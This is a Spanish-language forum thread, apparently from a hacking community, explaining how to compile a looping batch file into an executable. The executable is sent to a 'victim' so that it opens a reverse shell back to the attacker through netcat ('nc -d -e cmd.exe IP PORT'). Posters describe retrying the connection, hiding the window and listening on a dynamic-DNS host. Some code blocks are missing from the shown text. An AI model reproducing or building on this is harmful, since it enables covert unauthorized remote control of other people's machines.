Eso con el Quick Batch File Compiler, en Modo Ghost, solo crea un cmd.exe a la espera de una conexión. Cuando uno ejecuta nc -d -e cmd.exe IP PORT, trata de conectar, pero si no pilla la IP deja de trabajar, por eso el goto, para que trate de conectar en todo momento.

Cuando pilla la conexión sigue kedando el cmd.exe pero se inicia el nc.exe tambn, a si que da igual que ahi te manten el cmd.exe, la conexión ya fue echa.

Tambn se puede meter un ping entremedio, de la siguiente manera
De esta forma intentaria una conexión kada 15 min
Aunque puede que no sea necesario en realidad..
Solo lo agrego por que lo sake de la e-zine de insegurity N3
Ya no digo mas

Salu2 

Mira chalo11, para poder obtener una shell con netcat, la victima tiene que tener netcat. 
Que es precisamente el problema.

Bueno este batch se lo mandas a la victima, lo puedes encapsular a .exe :


Y tu te pones en la espera de la conexion asi, y claro que tienes que tener tu no-ip abierto :

El codigo anterior especifique el puerto 123, pero tu puedes especificar cualquiera.

Saludos!